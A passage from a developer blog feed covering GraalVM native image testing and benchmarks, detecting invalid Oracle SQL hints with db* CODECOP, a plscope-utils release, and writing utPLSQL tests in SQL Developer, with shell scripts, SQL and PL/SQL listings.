Formatting file 42 of 56: /Users/phs/github/plscope-utils/database/utils/package/type_util.pks... done.
Formatting file 43 of 56: /Users/phs/github/plscope-utils/database/utils/type/col_lineage_type.sql... done.
Formatting file 44 of 56: /Users/phs/github/plscope-utils/database/utils/type/col_type.sql... done.
Formatting file 45 of 56: /Users/phs/github/plscope-utils/database/utils/type/obj_type.sql... done.
Formatting file 46 of 56: /Users/phs/github/plscope-utils/database/utils/type/t_col_lineage_type.sql... done.
Formatting file 47 of 56: /Users/phs/github/plscope-utils/database/utils/type/t_col_type.sql... done.
Formatting file 48 of 56: /Users/phs/github/plscope-utils/database/utils/type/t_obj_type.sql... done.
Formatting file 49 of 56: /Users/phs/github/plscope-utils/database/utils/user/plscope.sql... done.
Formatting file 50 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_col_usage.sql... done.
Formatting file 51 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_identifiers.sql... done.
Formatting file 52 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_ins_lineage.sql... done.
Formatting file 53 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_naming.sql... done.
Formatting file 54 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_statements.sql... done.
Formatting file 55 of 56: /Users/phs/github/plscope-utils/database/utils/view/plscope_tab_usage.sql... done.
Formatting file 56 of 56: /Users/phs/github/plscope-utils/sqldev/README.md... done.

Finally, a working native image.

Testing

I have a total of 604 JUnit tests for the formatter. When all tests succeed I can expect that the executable JAR works as well.

Now we need additional tests to detect runtime errors that happen only when running a native image. This is necessary for missing configurations as shown above, but also for other cases where the native image behaves differently.

In my case I want to run three existing JUnit tests for the main method in TvdFormat. How do I do that? A good choice is to use the Maven plugin for GraalVM Native Image building (of course there is also a plugin for Gradle). This plugin produces a dedicated native image for tests. When you run this native image, all configured tests are executed and the results are shown on the console. A non-zero exit status indicates a failure.
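
A sketch of the plugin wiring in the pom.xml, assuming the org.graalvm.buildtools:native-maven-plugin; the version is illustrative and the project's actual Maven configuration is linked below:

<plugin>
   <groupId>org.graalvm.buildtools</groupId>
   <artifactId>native-maven-plugin</artifactId>
   <version>0.9.9</version>
   <extensions>true</extensions>
   <executions>
      <execution>
         <id>test-native</id>
         <goals>
            <goal>test</goal>
         </goals>
         <phase>test</phase>
      </execution>
   </executions>
</plugin>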

When you run mvn -Dnative.skip=false integration-test, a native image named native-tests is created and executed during the build. You can also run it after the build via ./native-tests. It produces the following console output:

JUnit Platform on Native Image - report
----------------------------------------

com.trivadis.plsql.formatter.standalone.tests.TvdFormatTest > jsonArrayFileTest() SUCCESSFUL

com.trivadis.plsql.formatter.standalone.tests.TvdFormatTest > jsonArrayDirTest() SUCCESSFUL

com.trivadis.plsql.formatter.standalone.tests.TvdFormatTest > jsonObjectFileTest() SUCCESSFUL


Test run finished after 3198 ms
[         2 containers found      ]
[         0 containers skipped    ]
[         2 containers started    ]
[         0 containers aborted    ]
[         2 containers successful ]
[         0 containers failed     ]
[         3 tests found           ]
[         0 tests skipped         ]
[         3 tests started         ]
[         0 tests aborted         ]
[         3 tests successful      ]
[         0 tests failed          ]

You find these JUnit tests here and the Maven configuration here.

Maybe you wonder why I do not run all JUnit tests. Simply put, they do not work. Some of them intentionally, because they test the integration with SQLcl, which is not applicable in the standalone image (the necessary libraries are not included on purpose). Other test cases require configuration changes or need to be rewritten for use in native images. In other words, there is still work to be done.

Performance

What to Measure

Let’s compare the runtimes of the following execution variants:

  1. Native image with GraalVM CE 21.3.0 (build 17.0.1+12-jvmci-21.3-b05)
  2. Executable JAR with GraalVM CE 21.3.0 (build 17.0.1+12-jvmci-21.3-b05)
  3. Executable JAR with JDK 17.0.1 for macOS ARM 64

The GraalVM JDK is not yet available for macOS ARM 64 (see GitHub issue). This means that we must use the Intel x64 variant, which requires Rosetta 2 to translate the Intel x64 instructions for the M1 Max chip. This emulation works quite well and is transparent to the user. However, it costs time. To get an idea of the performance improvement of the native image technology, options (1) and (2) should be compared. Option (3) is still interesting for comparison with option (2). It shows the impact of the Rosetta 2 emulation.

I’d like to measure the performance of these two scenarios:

  1. Startup time (start the executable without parameters to show the help)
  2. Formatting 56 files (of the plscope-utils project, what we ran previously)

Scenario 1 – Startup Time

In this scenario we measure the startup time of the formatter. This means we call the formatter without parameters to show the help. The shell script shows what I measured.

Shell script - startup time

#!/bin/zsh

call() {
    echo "$1" "($2)"
    for ((i=0; i<3; i++))
    do
       eval "time $2 > /dev/null"
    done;
}

echo
echo Scenario 1 - Startup Time
echo -------------------------
unset JAVA_HOME
call "1) Native Image" "./tvdformat"
export JAVA_HOME=$HOME/Applications/graalvm-ce-java17-21.3.0/Contents/Home
call "2) GraalVM" "java -jar ./tvdformat.jar"
export JAVA_HOME=`/usr/libexec/java_home -v 17`
call "3) ARM JDK" "java -jar ./tvdformat.jar"

Scenario 1 - Startup Time
-------------------------
1) Native Image (./tvdformat)
  0.29s user 0.05s system 94% cpu 0.355 total
  0.29s user 0.04s system 96% cpu 0.336 total
  0.29s user 0.04s system 96% cpu 0.337 total
2) GraalVM (java -jar ./tvdformat.jar)
  2.99s user 0.43s system 143% cpu 2.387 total
  2.97s user 0.42s system 142% cpu 2.376 total
  2.99s user 0.43s system 142% cpu 2.392 total
3) ARM JDK (java -jar ./tvdformat.jar)
  0.65s user 0.04s system 167% cpu 0.414 total
  0.65s user 0.05s system 165% cpu 0.419 total
  0.64s user 0.04s system 159% cpu 0.427 total

I used the result of the second execution per variant to create the chart.

Scenario 1 - Startup Time - Native Image vs Executable JAR

The native image delivers by far the fastest startup times. It's 7 times faster and uses 10 times less CPU resources. Rosetta 2 leads to an overhead of about factor 4.7 from a CPU usage perspective.

Scenario 2 – Formatting 56 files

In this scenario we measure the time to format 56 PL/SQL and SQL files of the plscope-util project. The shell script shows what I measured.

Shell script - formatting 56 files

#!/bin/zsh

call() {
    echo "$1" "($2)"
    for ((i=0; i<3; i++))
    do
       eval "time $2 $HOME/github/plscope-utils \
            xml=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_advanced_format.xml \
            arbori=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_custom_format.arbori \
            > /dev/null"
    done;
}

echo
echo Scenario 2 - Formatting 56 files
echo --------------------------------
unset JAVA_HOME
call "1) Native Image" "./tvdformat"
export JAVA_HOME=$HOME/Applications/graalvm-ce-java17-21.3.0/Contents/Home
call "2) GraalVM" "java -jar ./tvdformat.jar"
export JAVA_HOME=`/usr/libexec/java_home -v 17`
call "3) ARM JDK" "java -jar ./tvdformat.jar"

Scenario 2 - Formatting 56 files
--------------------------------
1) Native Image (./tvdformat)
  44.91s user 1.82s system 305% cpu 15.317 total
  45.12s user 1.69s system 305% cpu 15.304 total
  45.85s user 1.61s system 309% cpu 15.344 total
2) GraalVM (java -jar ./tvdformat.jar)
  77.32s user 4.22s system 365% cpu 22.297 total
  77.59s user 4.32s system 371% cpu 22.044 total
  82.49s user 4.77s system 372% cpu 23.451 total
3) ARM JDK (java -jar ./tvdformat.jar)
  17.47s user 0.62s system 244% cpu 7.385 total
  17.02s user 0.57s system 242% cpu 7.262 total
  17.84s user 0.66s system 246% cpu 7.495 total

I used the result of the second execution per variant to create the chart.

Scenario 2 - Formatting 56 Files - Native Image vs Executable JAR

The native image is about 30% faster and uses about 40% less CPU resources. Rosetta 2 leads to an overhead of about factor 4.7 from a CPU usage perspective.

Conclusion

Wow, just wow, when I look at the performance and resource consumption figures of a native image. Startup times are really amazing and I was surprised by the results when formatting 56 files. The native image only consumes about half of the CPU resources compared to the executable JAR variant. This means lower operating costs while improving the end-user experience.

The price for a native image is higher development costs and the risk of runtime errors that would not occur in traditional Java environments. You definitely need to adjust your testing strategies to mitigate that risk. This is mandatory, not an option.

In this blog post I eliminated all known runtime errors after four builds. In reality it took much longer. I spent a lot of time hunting down the reasons for different behaviours between the executable JAR and the native image. This might improve once the debugger becomes available for the community edition. But even then you have to build a new image after a change. Only then you can start debugging. This results in long feedback loops. It does not matter whether you instrument your code or use a debugger.

This technology is fairly new. I’m sure that the tooling will improve over time. In the meantime, I’d prefer to use native images only for simple artifacts.

The post GraalVM Native Image – First Impressions appeared first on Philipp Salvisberg's Blog.

Finding Wrong Hints


Introduction

I have been using the Oracle Database for many years. And I use hints. For experiments, but also in production code. There are cases when you know more than the Oracle Database, for example about the cardinality of a data source, the number of result rows to process or the number of expected executions of a statement. Hints are a way to provide additional information, limit the solution space and enable the database to do a better job. That’s a good thing.
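For illustration, here is a minimal sketch of such knowledge-passing hints, using the classic dept and emp sample tables; the values are made up, first_rows, leading and use_nl are documented hints:

-- tell the optimizer to optimize for fast retrieval of the first 10 rows
select /*+ first_rows(10) */ *
  from emp
 where deptno = 10;

-- fix the join order and method when we know the data better than the optimizer
select /*+ leading(d e) use_nl(e) */ d.dname, e.ename
  from dept d
  join emp e
    on e.deptno = d.deptno;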

Hints Are Instructions

Hints are passed as special comments at a certain position in SQL statements. They are comments, but they are also instructions. They have to be followed. However, there are cases when hints are not applicable. For example when you request the optimizer to use an index when there is no index defined for the underlying table. In such a case the Oracle Database has basically two options. Either throw an error or ignore the invalid instruction and find another solution. The Oracle Database does the latter.

Hint Report

Starting with version 19c you can produce a hint report that reveals unused hints. Here’s an example:

create table t (c1 integer, c2 varchar2(20));
insert into t values (1, 'one');
insert into t values (2, 'two');
select /*+ index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ index(t) */ * from t where c1 > 0
 
Plan hash value: 1601196873
 
------------------------------------------
| Id  | Operation                 | Name |
------------------------------------------
|   0 | SELECT STATEMENT          |      |
|   1 |  TABLE ACCESS STORAGE FULL| T    |
------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1 (U - Unused (1))
---------------------------------------------------------------------------
 
   1 -  SEL$1 / "T"@"SEL$1"
         U -  index(t)

The hint index(t) defined on line 4 is valid, but it’s reported as unused on line 25. No wonder. There is no index defined on table t.

Let’s create an index and rerun the query.

create unique index t_c1_i on t(c1);
select /*+ index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ index(t) */ * from t where c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1
---------------------------------------------------------------------------
 
   1 -  SEL$1 / "T"@"SEL$1"
           -  index(t)

Now the hint index(t) defined on line 2 is reported as used on line 24.

Mixing Hints and Comments

What happens if we mix hints and comments? It depends where you place the comment. Let’s look at the next example.

select /*+ index(t) forcing unnecessary index access */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ index(t) forcing unnecessary index access */ * from t where 
c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 4 (E - Syntax error (3))
---------------------------------------------------------------------------
 
   1 -  SEL$1
         E -  forcing
         E -  index 
         E -  unnecessary
 
   1 -  SEL$1 / "T"@"SEL$1"
           -  index(t)

The comment forcing unnecessary index access on line 1 is interpreted as a series of hints and reported as errors on lines 24 to 26. The token access was not reported. However, the hint index(t) was reported as used on line 29.

What happens if we move the comment to the beginning?

select /*+ forcing unnecessary index access index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ forcing unnecessary index access index(t) */ * from t where 
c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 3 (E - Syntax error (3))
---------------------------------------------------------------------------
 
   1 -  SEL$1
         E -  forcing
         E -  index 
         E -  unnecessary

The same invalid hints are reported as before on lines 24 to 26. However, the hint index(t) was used but not reported as such. This seems to be a limitation of the current hint report in the Oracle Database 21c.

Anyway, it clearly shows that you should not mix comments and hints. Instead you should write it like this:

select /* forcing unnecessary index access */ /*+ index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /* forcing unnecessary index access */ /*+ index(t) */ * from t 
where c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1
---------------------------------------------------------------------------
 
   1 -  SEL$1 / "T"@"SEL$1"
           -  index(t)

Now the hint index(t) is reported as used. All good, right?

The Problem

I like statically typed languages. Mainly because errors are reported at compile time whenever possible. However, to check hints I need to produce an explain plan. This is possible for a single statement only. This is cumbersome, especially when you write code in PL/SQL. As far as I know, there is no option to produce a compile error for invalid hints.

I recently reviewed a system and found a lot of invalid hints. Here are some real-life hints copied from a production code base:

  • /*+ parallel 4 */
  • /*+ no_xml_query_rewrite +materialize */
  • /*+ materialized */
  • /*+ first rows cardinality (a,10) */
  • /*+ append nologging */
  • /*+ le ading(g) u se_nl(g) u se_hash(p, b) */

The last example is a kind of commented-out hint series. In this case it’s clearly commented-out code. But if you see just a single hint like /*+ le ading(g) */ in the code, you do not know whether the space after le was entered intentionally or by accident.

So, how can we identify invalid hints in our code?

Step 1 – Distinguish Between Comments and Hints

We can configure Oracle’s SQL Developer to show hints in a different color than comments. Here’s the screenshot of an example I showed above:

Distinguish between comments and hints

Go to this GitHub repository and follow the instructions to configure your SQL Developer installation accordingly. See also this blog post for more information about the Arbori code that makes such code highlighting possible.

This step makes hints stand out in your code. However, it does not reveal invalid hints.

Step 2 – Install db* CODECOP for SQL Developer

To reveal invalid hints we need a linter. A tool that does some static code analysis. db* CODECOP is such a tool suite. The SQL Developer extension is available for free. It checks the editor content for violations of the Trivadis PL/SQL & SQL Coding Guidelines. Furthermore, db* CODECOP allows you to implement custom guideline checks. The example GitHub repository provides the following four guideline checks regarding hints:

  • G-9600: Never define more than one comment with hints.
  • G-9601: Never use unknown hints.
  • G-9602: Always use the alias name instead of the table name.
  • G-9603: Never reference an unknown table/alias.

To install db* CODECOP and these additional custom guideline checks follow the instructions in this GitHub repository.

Finding Wrong Hints With db* CODECOP

I asked my followers on Twitter if this hint is valid:

Twitter Poll

The result is not really representative. However, 25% thought that /*+ +materialize */ is a valid hint.

Checking the code with db* CODECOP reveals that the hint is invalid and the majority of the poll participants were right.

Invalid hint

Verify Result

But is the result of db* CODECOP correct? The following explain plan shows that the hint /*+ +materialize */ is not reported at all. It’s treated as a comment. Another example where the hint report is incomplete.

with e as (
   select /*+ +materialize */ *
     from emp
    where deptno = 10
)
select *
  from e;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
with e as (    select /*+ +materialize */ *      from emp     where 
deptno = 10 ) select *   from e
 
Plan hash value: 3956160932
 
------------------------------------------
| Id  | Operation                 | Name |
------------------------------------------
|   0 | SELECT STATEMENT          |      |
|   1 |  TABLE ACCESS STORAGE FULL| EMP  |
------------------------------------------

Let’s run the same query after removing the extra + in the hint:

with e as (
   select /*+ materialize */ *
     from emp
    where deptno = 10
)
select *
  from e;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
with e as (    select /*+ materialize */ *      from emp     where 
deptno = 10 ) select *   from e
 
Plan hash value: 3494145522
 
--------------------------------------------------------------------------------
| Id  | Operation                                | Name                        |
--------------------------------------------------------------------------------
|   0 | SELECT STATEMENT                         |                             |
|   1 |  TEMP TABLE TRANSFORMATION               |                             |
|   2 |   LOAD AS SELECT (CURSOR DURATION MEMORY)| SYS_TEMP_DFD9DB186_8AAEBD74 |
|   3 |    TABLE ACCESS STORAGE FULL             | EMP                         |
|   4 |   VIEW                                   |                             |
|   5 |    TABLE ACCESS STORAGE FULL             | SYS_TEMP_DFD9DB186_8AAEBD74 |
--------------------------------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1
---------------------------------------------------------------------------
 
   2 -  SEL$1
           -  materialize

Now, the materialize hint has an effect on the execution plan and the hint is reported as used on line 33.

Conclusion

I believe that hints are required for certain use cases. You may have a different opinion. However, if you are using hints in your code you should ensure that they are valid. db* CODECOP can help you to do that. The SQL Developer extension is free. Just use it.

The post Finding Wrong Hints appeared first on Philipp Salvisberg's Blog.

plscope-utils for SQL Developer 1.0 – What’s New?


Introduction

PL/Scope is an SDK for source code analysis. It has been available since Oracle Database 11g Release 1 and was significantly improved in 12c Release 2.

plscope-utils for SQL Developer is a SQL Developer extension that simplifies the compilation with PL/Scope, visualizes PL/Scope information under a PL/Scope node in the Connections window and provides various source code analysis reports.

Follow these instructions for a fresh install or an update to the latest version of plscope-utils for SQL Developer.

Updated Tree Structure

The level for grouping primary and secondary object types was removed. This makes the tree simpler. All object types can now be filtered. This is especially helpful for schemas with many objects. And there is an additional node for Sequences.

PL/Scope node in SQL Developer's Connection window (plscope-utils)

No more ORA-01436: CONNECT BY loop in user data

Many queries are based on recursive structures. In some data constellations, an ORA-01436 error caused no result to be returned. The reasons were manifold: wrongly fixed hierarchies or dependency loops in the Oracle data dictionary. However, incomplete hierarchies are now fixed without causing a loop, and all hierarchical queries use the cycle_clause, which detects loops, avoids such runtime errors and ensures a reasonable result even with loops in the underlying data.
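To illustrate the mechanism (not the actual plscope-utils code), here is a minimal recursive query with a cycle_clause, based on the classic emp table and its mgr hierarchy:

-- minimal sketch: the cycle clause marks looping rows instead of
-- raising a runtime error
with
   h (empno, ename, mgr) as (
      select empno, ename, mgr
        from emp
       where mgr is null
      union all
      select e.empno, e.ename, e.mgr
        from emp e
        join h
          on h.empno = e.mgr
   )
   cycle empno set is_cycle to 'Y' default 'N'
select empno, ename, mgr, is_cycle
  from h;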

Concise Representation of Identifiers

Romain Vassallo contributed a pull request for the plscope_identifiers view. He added a column name_usage to combine name, type, usage and sql_id in a single column with a left indent of two characters per level.

The Identifiers tab now includes a column Name (Type, Usage) with this nifty logic.
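The indentation logic could look roughly like this; a hedged sketch only, the column names (such as path_len for the hierarchy level) are assumptions and the real plscope_identifiers view is more elaborate:

-- hedged sketch; path_len is an assumed name for the hierarchy level
select lpad(' ', 2 * (path_len - 1))
       || name
       || ' (' || type || ', ' || usage
       || case when sql_id is not null then ', ' || sql_id end
       || ')' as name_usage
  from plscope_identifiers;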

PL/Scope identifiers tab in SQL Developer (plscope-utils)

That’s all?

Yes, regarding plscope-utils for SQL Developer. However, there are optional PL/SQL packages and views for static code analysis based on PL/Scope. Optional means that the SQL Developer extension does not need them. But if you have to analyze code in your Oracle database, they can be a good starting point for your work.

Related Information

If you are interested in PL/Scope, the following links may be of interest:

The post plscope-utils for SQL Developer 1.0 – What’s New? appeared first on Philipp Salvisberg's Blog.

Testing With utPLSQL – Made Easy With SQL Developer


Nowadays, everything is about automation. Software testing is no exception. After an introduction, we will create and run utPLSQL tests with Oracle SQL Developer for a fictitious user story. Our tests will cover a PL/SQL package, a virtual column, two database triggers and a view. The full code samples can be found here.

This blog post is based on my German article Testen mit utPLSQL – Leicht gemacht mit SQL Developer, published in issue 4/2022 of the Red Stack Magazin.

What is Test Automation?

Here’s the definition from the English Wikipedia page:

Test automation is the use of software separate from the software being tested to control the execution of tests and the comparison of actual outcomes with predicted outcomes.

If the actual results match the expected results, then the tests are successful. An important aspect of test automation is the prior definition of expected results. Expected results are simply requirements. In other words, we use automated tests to check whether the requirements for a software are met.

Why Do We Need Automated Tests?

The use of agile methods and the associated shorter release cycles mean that we need to test software more frequently. In a CI/CD environment, automated tests can be executed directly after a commit in a version control system. Through this continuous testing, the state of the software quality is constantly available. In case of deviations, the possible causes can be identified more quickly due to the shorter intervals between tests. In addition, the changes since the last successful test run are still present in the minds of the developers. All this simplifies troubleshooting.

When software is tested only semi-automatically or manually, this leads to higher costs, higher risks, delivery delays or quality problems. It is simply not efficient to perform automatable tasks manually.

Repeating automated tests is cheap. Unlike manual tests, there is no reason to compromise. This is especially important for central components of a software solution. We need to ensure that changes do not have any unwanted effects on other parts of the software solution.

Do Automated Tests Have Downsides?

In the end, an automated test is also software that needs to be maintained. Tests that are not reliable are especially problematic. These are so-called “flaky” tests, which sometimes fail, but if you repeat them often enough, deliver the expected result. Such tests quickly do more harm than good. The more flaky tests there are, the higher the probability that the CI job will fail, resulting in manual activities.

What Can We Test in the Database?

Basically, every component of an application installed in the database can be tested automatically. These are, for example, object types, packages, procedures, functions, triggers, views and constraints.

We do not write tests for ordinary not null check constraints since we do not want to test the basic functionality of a database. However, it might be useful to test a complex expression of a virtual column or a complex condition of a check constraint. A view is based on a select statement. select statements can be quite complex even without PL/SQL units in the with_clause. Consequently, we also have the need to check whether views return the expected results.

Object types, packages, procedures, functions and triggers mainly contain code in PL/SQL. However, PL/SQL allows embedding various other languages such as SQL, C, Java or JavaScript. It goes without saying that these components should be tested with automated tests. This also applies to database triggers, which cannot be executed directly. Of course, it simplifies testing if the logic of the database triggers is stored in PL/SQL packages and database triggers only contain simple calls to package procedures.

What Is utPLSQL?

utPLSQL is a testing suite for code in the Oracle database and is based on concepts from other unit testing frameworks such as JUnit and RSpec. The figure below shows the components of the utPLSQL suite.

utPLSQL

Core Testing Framework

The Core Testing Framework is installed in a dedicated schema of the Oracle database. All tables in this schema are used for temporary data or caching purposes. That means newer or older versions of utPLSQL can be installed at any time without data loss. Test suites are PL/SQL packages which are annotated with a special comment --%suite. These special comments are called annotations and provide utPLSQL with all information for test execution. utPLSQL uses different concepts to efficiently read the required data from the Oracle data dictionary views, so that tests can be executed without noticeable time delay even in schemas with more than 40 thousand PL/SQL packages.

Development

The utPLSQL plugins for SQL Developer from Oracle and PL/SQL Developer from Allround Automations support database developers in creating, executing and debugging tests. Code coverage reports provide information about which code is covered by tests. These two plugins are provided by the utPLSQL team. Quest and JetBrains position utPLSQL as the standard for testing code in an Oracle database and support utPLSQL directly in their products TOAD and DataGrip.

Test Automation

utPLSQL uses reporters to produce the results of a test run in any number of output formats. The command line client or the Maven plugin can be used for this purpose. A popular output format is JUnit, since it is compatible with most tools in the CI/CD area. TeamCity and Team Foundation Server are supported with specific reporters. For code coverage, utPLSQL provides reporters for SonarQube, Coveralls and Cobertura. Thanks to the flexible reporter concept, utPLSQL can be integrated into any CI/CD environment. For example, in Jenkins, Bamboo, Azure DevOps, Travis CI, GitLab, Github Actions and many more.

Case Study And Solution Approach

We use a schema redstack with the known Oracle tables dept and emp. In the current sprint, the following user story from our HR manager is scheduled:

As an HR manager, I need a table with the key figures salary total, number of employees and average salary per department to assess fairness.

I interpret the requirement literally and create a table according to listing 1.

create table deptsal (
    deptno   number(2, 0)  not null
       constraint deptsal_pk primary key,
    dname    varchar2(14)  not null,
    sum_sal  number(10, 2) not null,
    num_emps number(4, 0)  not null,
    avg_sal  number(7, 2)  
       generated always as (
          case
             when num_emps != 0 then
                round(sum_sal / num_emps, 2)
             else
                0
             end
       ) virtual
);

I populate the table using a PL/SQL package procedure called “etl.refresh_deptsal”. The exact implementation is not so important. If you are interested you can find it here.

Test Suite and Test Run

Writing the code before the test is not test-driven development. Anyway, I am a pragmatist and not a dogmatist. In the end, I feel the need to check if my code does what it should do. To execute the code, I use utPLSQL. The utPLSQL extension for SQL Developer helps me to do this. For example, I can generate the skeleton of a test suite based on my existing implementation or use the code templates to create a test package, a test package body or a test procedure. The following figure shows the utPLSQL preferences of the generator and the code templates in SQL Developer.

utPLSQL preferences

In a new worksheet, I entered ut_spec followed by Ctrl-Space to fill in the template for a test suite. Listing 2 shows the result.

create or replace package test_etl is
   --%suite

   --%test
   procedure refresh_deptsal;
end test_etl;
/

The annotation --%suite identifies the package test_etl as a test suite. The annotation for the package must follow the keyword is or as. Up to the first empty line all annotations are assigned to the package. The annotation --%test marks the procedure refresh_deptsal as a test. A test suite can consist of any number of tests. Tests can optionally be grouped with the annotations --%context(<name>) and --%endcontext. utPLSQL supports more than 20 annotations, which are available as snippets in SQL Developer.
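For illustration, grouping with contexts could look like this; a hedged sketch, not part of the case study:

create or replace package test_etl_grouped is
   --%suite

   --%context(refresh)

   --%test
   procedure refresh_deptsal;

   --%endcontext

   --%context(cleanup)

   --%test
   procedure refresh_deptsal_del_dept;

   --%endcontext
end test_etl_grouped;
/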

I can now run this test suite. Either via the context menu in the editor or on a node in the navigation tree. The following figure shows the utPLSQL test runner after the execution of the test.

utPLSQL error

The test runner uses two additional temporary connections to the database in the background. This way SQL Developer is never blocked, which is very helpful, especially for more time-consuming tests. It is even possible to run independent tests simultaneously.

Test Implementation and Test Run

The test refresh_deptsal produces an error. The reason is obvious. The implementation of the test is missing. So, let’s create the missing package body.

create or replace package body test_etl is
   procedure refresh_deptsal is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      etl.refresh_deptsal;
      
      -- assert;
      open c_actual for select * from deptsal;
      open c_expected for
         select d.deptno,
                d.dname,
                nvl(sum(e.sal), 0) as sum_sal,
                nvl(count(e.empno), 0) as num_emps,
                nvl(trunc(avg(e.sal), 2), 0) as avg_sal
           from dept d
           left join emp e
             on e.deptno = d.deptno
          group by d.deptno, d.dname;
      ut.expect(c_actual).to_equal(c_expected)
                         .join_by('DEPTNO');
   end refresh_deptsal;
end test_etl;
/

The implementation of the test in listing 3 uses the AAA pattern. It stands for Arrange-Act-Assert. In the arrange step, the test is prepared. Here, this step is missing since the test is based on existing data. In the act step, we execute the code under test. And in the assert step, we compare the actual result with the expected result. utPLSQL provides a variety of type-safe matchers for this purpose. In this case we compare two cursors. The data types as well as the contents of the columns are compared for all rows. The figure below shows the result after our next test run.

utPLSQL failure

Now the test run produces a failure. This means that the test does not deliver the expected result. In the Failures tab of the test runner, the details are displayed. We see that we expected 4 rows and also got 4 rows. However, there are differences in the column avg_sal for two records. This looks like a rounding difference. Obviously we round in the code and truncate in the test. Which is correct? I would say rounding is common and that’s why we should adjust the test. After replacing trunc with round in the test implementation (see line 16 in listing 3), the test will complete successfully.

Test Cases for Insert, Update and Delete

The test refresh_deptsal expects data in the tables dept and emp. If the tables are empty, the test still works. This is not wrong, but it shows that the quality of the test is strongly dependent on our existing data. Also, we run the risk that the test code for the assert mirrors the implementation and any errors are repeated. Listing 4 shows additional tests based on our own test data.

create or replace package body test_etl is
   procedure refresh_deptsal is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      update emp
         set sal = sal
       where rownum = 1;

      -- assert;
      open c_actual for select * from deptsal;
      open c_expected for
         select d.deptno,
                d.dname,
                nvl(sum(e.sal), 0) as sum_sal,
                nvl(count(e.empno), 0) as num_emps,
                nvl(round(avg(e.sal), 2), 0) as avg_sal
           from dept d
           left join emp e
             on e.deptno = d.deptno
          group by d.deptno, d.dname;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal;

   procedure refresh_deptsal_new_dept_without_emp is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');
      
      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      open c_expected for
         select -10 as deptno,
                'utPLSQL' as dname,
                0 as sum_sal,
                0 as num_emps,
                0 as avg_sal
           from dual;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal_new_dept_without_emp;

   procedure refresh_deptsal_new_dept_with_emp is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-1, 'Jacek', 'Developer', trunc(sysdate), 4700, -10);
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-2, 'Sam', 'Developer', trunc(sysdate), 4300, -10);
      
      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      open c_expected for
         select -10 as deptno,
                'utPLSQL' as dname,
                9000 as sum_sal,
                2 as num_emps,
                4500 as avg_sal
           from dual;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal_new_dept_with_emp;

   procedure refresh_deptsal_upd_dept_and_emp is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- arrange
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-1, 'Jacek', 'Developer', trunc(sysdate), 4700, -10);
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-2, 'Sam', 'Developer', trunc(sysdate), 4300, -10);
      
      -- act
      update dept set dname = 'Testing' where deptno = -10;
